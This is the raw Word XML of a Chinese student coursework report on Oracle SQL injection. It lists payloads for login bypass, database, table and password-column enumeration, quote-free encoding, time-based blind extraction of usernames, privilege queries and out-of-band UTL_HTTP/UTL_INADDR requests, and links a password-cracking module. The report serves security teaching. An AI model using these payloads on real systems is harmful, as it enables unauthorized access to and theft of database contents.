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Cs w:val="28"/>
        </w:rPr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286702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8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pStyle w:val="8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ORACLE注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="6675" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-6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47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姓名：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骆硕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学号：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3116004512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院系：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</w:rPr>
              <w:t>智能制造学部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bCs/>
                <w:sz w:val="36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none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</w:rPr>
              <w:t>专业：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电子信息工程（信息安全）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941" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/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28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>指导老师：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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36"/>
                <w:szCs w:val="28"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>温强</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>报告提交时间：20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="仿宋_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>日</w:t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/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="center"/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1.默认数据库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6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系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="428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适用于所有版本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6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SYSAUX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/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适用于所有版本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</w:t>
      </w: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注释掉查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="13"/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Style w:val="13"/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注入后，以下内容可用于注释掉查询的其余部分：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="10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8220" w:type="dxa"/>
          </w:tcPr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例子：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* FROM Users WHERE username =''OR 1 = 1 - 'AND password ='';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="13"/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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7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3.测试版本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26" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="15" w:tblpY="-1861"/>
              <w:tblOverlap w:val="never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522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banner FROM v $ version WHERE banner LIKE'Oracle％';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banner FROM v $ version WHERE banner LIKE'TNS％';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version FROM v$instance;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl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笔记：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr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Oracle中的所有SELECT语句都必须包含一个表。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dual 是一个虚拟表，可用于测试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4.数据库凭据</w:t>
      </w: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68" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="-2" w:tblpY="699"/>
              <w:tblOverlap w:val="never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name FROM v $ database;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instance_name FROM v $ instance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global_name FROM global_name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widowControl w:val="0"/>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/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SYS.DATABASE_NAME FROM DUAL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当前数据库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用户数据库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numPr>
                      <w:ilvl w:val="0"/>
                      <w:numId w:val="0"/>
                    </w:numPr>
                    <w:bidi w:val="0"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:i w:val="0"/>
                      <w:iCs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vertAlign w:val="baseline"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="13"/>
                      <w:rFonts w:hint="default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DISTINCT owner FROM all_tables;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bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器主机名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host_name FROM v$instance; (Privileged)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UTL_INADDR.get_host_name FROM dual;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UTL_INADDR.get_host_name('10.0.0.1') FROM dual;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UTL_INADDR.get_host_address FROM dual;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6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>表和列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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default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cs="Verdana"/>
                <w:i w:val="0"/>
                <w:iCs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检索表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table_name FROM all_tables;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检索列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column_name FROM all_tab_columns;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从列名称中查找表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column_name FROM all_tab_columns WHERE table_name ='Users';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从表名中查找列</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/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table_name FROM all_tab_tables WHERE column_name ='password';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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Fonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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一次检索多个表</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier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RTRIM(XMLAGG(XMLELEMENT(e,table_name||',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;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7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>避免使用报价单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>与其他RDBMS不同，Oracle允许对表/列名进行编码。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0"/>
        <w:gridCol w:w="3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0x09120911091 FROM dual;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="377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十六进制编码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0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CHR(32)||CHR(92)||CHR(93) FROM dual;</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3772" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both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CHAR（）函数。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</w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符串连接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'a'||'d'||'mi'||'n' FROM dual;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9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>条件陈述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CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:fill="F3F3F7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10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定时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2" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/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延时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SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>繁重的时间延迟</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10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jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="13"/>
                      <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma"/>
                      <w:i w:val="0"/>
                      <w:caps w:val="0"/>
                      <w:color w:val="222222"/>
                      <w:spacing w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:shd w:val="clear" w:fill="FFFFFF"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) &gt; 0 AND 300 &gt; ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));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ind w:left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</w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>特权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privilege FROM session_privs;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grantee, granted_role FROM dba_role_privs; (Privileged)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eastAsia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12.带外通道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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DNS请求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UTL_HTTP.REQUEST('http://localhost') FROM dual;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Style w:val="13"/>
                <w:rFonts w:hint="default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SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;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0"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222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default" w:ascii="宋体" w:hAnsi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/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>13.密码破解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宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pP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instrText xml:space="preserve"> HYPERLINK "https://www.rapid7.com/db/modules/auxiliary/analyze/jtr_oracle_fast" </w:instrText>
            </w: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t>https://www.rapid7.com/db/modules/auxiliary/analyze/jtr_oracle_fast</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体" w:cs="Tahoma"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="222222"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="444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814320"/>
            <wp:effectExtent l="0" t="0" r="444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65E2E"/>
    <w:rsid w:val="0359769F"/>
    <w:rsid w:val="046949C2"/>
    <w:rsid w:val="05131405"/>
    <w:rsid w:val="054123C9"/>
    <w:rsid w:val="05B31BBD"/>
    <w:rsid w:val="06633E83"/>
    <w:rsid w:val="079579AA"/>
    <w:rsid w:val="09963B46"/>
    <w:rsid w:val="09FB15AA"/>
    <w:rsid w:val="09FE7EEF"/>
    <w:rsid w:val="0C096A1A"/>
    <w:rsid w:val="0D0F1B97"/>
    <w:rsid w:val="0D183C93"/>
    <w:rsid w:val="0DF052AB"/>
    <w:rsid w:val="0E0D357B"/>
    <w:rsid w:val="0E165704"/>
    <w:rsid w:val="10165E2E"/>
    <w:rsid w:val="10CF4EFC"/>
    <w:rsid w:val="10E307CF"/>
    <w:rsid w:val="11DB0352"/>
    <w:rsid w:val="137046FE"/>
    <w:rsid w:val="140C1099"/>
    <w:rsid w:val="17F86F1F"/>
    <w:rsid w:val="187F675C"/>
    <w:rsid w:val="19DD4EEF"/>
    <w:rsid w:val="1AE61C9C"/>
    <w:rsid w:val="1CAE0B86"/>
    <w:rsid w:val="1E313644"/>
    <w:rsid w:val="206936E3"/>
    <w:rsid w:val="20EE1B51"/>
    <w:rsid w:val="2148593F"/>
    <w:rsid w:val="22D43E0A"/>
    <w:rsid w:val="23175804"/>
    <w:rsid w:val="24327724"/>
    <w:rsid w:val="246240BC"/>
    <w:rsid w:val="251B45FB"/>
    <w:rsid w:val="25724BCB"/>
    <w:rsid w:val="26917700"/>
    <w:rsid w:val="2704426D"/>
    <w:rsid w:val="27E96DEF"/>
    <w:rsid w:val="28A30183"/>
    <w:rsid w:val="2A923B9F"/>
    <w:rsid w:val="2AB0225E"/>
    <w:rsid w:val="2BA130DE"/>
    <w:rsid w:val="2D041D3F"/>
    <w:rsid w:val="2D2717C7"/>
    <w:rsid w:val="2DA71058"/>
    <w:rsid w:val="2F987BAA"/>
    <w:rsid w:val="3083317F"/>
    <w:rsid w:val="31867980"/>
    <w:rsid w:val="323A2301"/>
    <w:rsid w:val="325F21BD"/>
    <w:rsid w:val="32A21D66"/>
    <w:rsid w:val="32F3783D"/>
    <w:rsid w:val="336F5D0B"/>
    <w:rsid w:val="33D323AF"/>
    <w:rsid w:val="35E837EC"/>
    <w:rsid w:val="37162ACB"/>
    <w:rsid w:val="37597F35"/>
    <w:rsid w:val="37887E95"/>
    <w:rsid w:val="3A607FEE"/>
    <w:rsid w:val="3A873586"/>
    <w:rsid w:val="3A88410A"/>
    <w:rsid w:val="3BB45797"/>
    <w:rsid w:val="3C294130"/>
    <w:rsid w:val="3CBB5431"/>
    <w:rsid w:val="3F99216C"/>
    <w:rsid w:val="41554852"/>
    <w:rsid w:val="41777F36"/>
    <w:rsid w:val="418D053E"/>
    <w:rsid w:val="41D57BE2"/>
    <w:rsid w:val="41DE785E"/>
    <w:rsid w:val="43F64B36"/>
    <w:rsid w:val="46B10063"/>
    <w:rsid w:val="46D85FCB"/>
    <w:rsid w:val="492F61BE"/>
    <w:rsid w:val="4A543302"/>
    <w:rsid w:val="4BDE4555"/>
    <w:rsid w:val="4C0C7527"/>
    <w:rsid w:val="4C3B3230"/>
    <w:rsid w:val="4E2952DE"/>
    <w:rsid w:val="4FDF40B4"/>
    <w:rsid w:val="50B80D70"/>
    <w:rsid w:val="50BA3194"/>
    <w:rsid w:val="53EF72B5"/>
    <w:rsid w:val="54841A5D"/>
    <w:rsid w:val="55AA2384"/>
    <w:rsid w:val="55E73C14"/>
    <w:rsid w:val="56DF1235"/>
    <w:rsid w:val="5B680C80"/>
    <w:rsid w:val="5CA63F78"/>
    <w:rsid w:val="5D175394"/>
    <w:rsid w:val="5F693357"/>
    <w:rsid w:val="5FBA753F"/>
    <w:rsid w:val="5FEA2982"/>
    <w:rsid w:val="6176288E"/>
    <w:rsid w:val="65C54D9C"/>
    <w:rsid w:val="66615CC3"/>
    <w:rsid w:val="66687455"/>
    <w:rsid w:val="67381AEB"/>
    <w:rsid w:val="681C3CDD"/>
    <w:rsid w:val="6AB3440D"/>
    <w:rsid w:val="6D2A5D40"/>
    <w:rsid w:val="6DDE5D40"/>
    <w:rsid w:val="6F414FA2"/>
    <w:rsid w:val="70101DE6"/>
    <w:rsid w:val="718D2605"/>
    <w:rsid w:val="71E3634F"/>
    <w:rsid w:val="736318AF"/>
    <w:rsid w:val="73840DA6"/>
    <w:rsid w:val="73885FE0"/>
    <w:rsid w:val="746A2034"/>
    <w:rsid w:val="75564319"/>
    <w:rsid w:val="75CA6BCE"/>
    <w:rsid w:val="762D708B"/>
    <w:rsid w:val="76EA1DE5"/>
    <w:rsid w:val="775E5ADA"/>
    <w:rsid w:val="77F11FB9"/>
    <w:rsid w:val="794F5604"/>
    <w:rsid w:val="7AB70067"/>
    <w:rsid w:val="7B154A0E"/>
    <w:rsid w:val="7BB8093E"/>
    <w:rsid w:val="7CD01864"/>
    <w:rsid w:val="7D510AAC"/>
    <w:rsid w:val="7DF92CB3"/>
    <w:rsid w:val="7E4F6FB2"/>
    <w:rsid w:val="7F46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宋体" w:cstheme="minorBidi"/>
      <w:sz w:val="28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2019-06-14T11:12:00Z</dcterms:created>
  <dc:creator>.ｏ°○.•°○•°゜</dc:creator>
  <cp:lastModifiedBy>.ｏ°○.•°○•°゜</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-29T04:43:05Z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